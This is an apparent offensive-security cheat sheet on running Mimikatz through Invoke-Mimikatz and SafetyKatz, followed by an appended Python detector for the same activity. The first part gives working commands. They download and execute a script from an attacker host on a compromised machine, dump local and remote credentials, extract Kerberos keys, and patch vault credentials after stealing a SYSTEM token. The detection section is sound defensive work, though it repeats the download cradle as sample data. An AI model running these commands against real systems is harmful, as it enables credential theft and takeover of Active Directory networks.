The script can be used to dump credentials, tickets and more using mimikatz from PowerShell without dropping the mimikatz exe to disk. It is very useful for passing and replaying hashes and tickets, and for many interesting Active Directory attacks.
Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into memory, and all of mimikatz's functions can be used from this script. The script needs administrative privileges to dump credentials from the local machine. Other attacks need specific privileges, which are covered where each attack is discussed.
To download Invoke-Mimikatz on a compromised machine, run:
```powershell
iex (new-object system.net.webclient).DownloadString('http://<ip.of.attacker.machine>:<port>/Invoke-Mimikatz.ps1')
```
Dump credentials on the local machine:
```powershell
Invoke-Mimikatz -DumpCreds
```
Dump credentials on multiple remote machines:
```powershell
Invoke-Mimikatz -DumpCreds -ComputerName @("server1","server2")
```
There are C# versions of Invoke-Mimikatz.ps1, such as SafetyKatz.exe and SharpKatz.exe, with the same functionality:
<aside> 👉🏻 SafetyKatz creates a minidump of lsass (a temporary .DMP file is written to the machine) and then PELoader runs Mimikatz against it.
</aside>
Extract Kerberos keys:
```powershell
.\SafetyKatz.exe "sekurlsa::ekeys" "exit"
```
Extract credentials from all providers (the authentication packages installed):
```powershell
.\SafetyKatz.exe "sekurlsa::logonpasswords" "exit"
```
Extract credentials stored by Task Scheduler (needs SYSTEM privileges; `token::elevate` looks for a token from NT AUTHORITY\SYSTEM and impersonates it):
```powershell
.\SafetyKatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit"
C:\Users\Public\Reflect.exe 'http://<ip.of.attacker.machine>:<port>/SafetyKatz.exe' "privilege::debug" "token::elevate" "vault::cred /patch" "exit"
```
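Added example, not from the original page or from the Invoke-Mimikatz/SafetyKatz projects: a small detection routine run over constructed Sysmon Event ID 10 (ProcessAccess) and PowerShell Event ID 4104 (script block) records, flagging the two behaviours described above, the download-and-reflect cradle and a non-system process opening lsass with read access, which both the SafetyKatz minidump and `Invoke-Mimikatz -DumpCreds` require. The allowlist, file paths, and sample events are assumptions.

```python
import re

# Constructed sample records, shaped like Sysmon Event ID 10 (ProcessAccess)
# and PowerShell Event ID 4104 (script block logging). Not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\Public\SafetyKatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 4104, "ScriptBlockText": "iex (new-object system.net.webclient)"
     ".DownloadString('http://192.0.2.10:8080/Invoke-Mimikatz.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Temp | Sort-Object Length"},
]

# Reading lsass memory (a minidump or a reflective sekurlsa call) requires
# PROCESS_VM_READ; a handle without that bit cannot dump credentials.
PROCESS_VM_READ = 0x0010
# Assumed allowlist of Windows components that legitimately hold broad lsass handles.
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
# Download-cradle and mimikatz indicators taken from the commands on this page.
CRADLE_RE = re.compile(r"downloadstring|invoke-expression|\biex\b", re.I)
MIMIKATZ_RE = re.compile(r"invoke-mimikatz|sekurlsa::|privilege::debug|vault::cred", re.I)


def classify(event):
    """Return (label, detail) for a suspicious event, or None."""
    if event["EventID"] == 10 and event["TargetImage"].lower().endswith(r"\lsass.exe"):
        source = event["SourceImage"]
        if source.lower() in LSASS_ALLOWLIST:
            return None
        if int(event["GrantedAccess"], 16) & PROCESS_VM_READ:
            return ("lsass-read-access", source)
    elif event["EventID"] == 4104:
        text = event["ScriptBlockText"]
        if CRADLE_RE.search(text) and MIMIKATZ_RE.search(text):
            return ("mimikatz-download-cradle", text[:60])
    return None


def scan(events):
    """Run classify over a list of records and keep only the findings."""
    return [finding for finding in map(classify, events) if finding]
```

A svchost handle without PROCESS_VM_READ and the allowlisted csrss handle produce no finding, so the rule stays quiet on normal lsass traffic while catching both tools' access pattern.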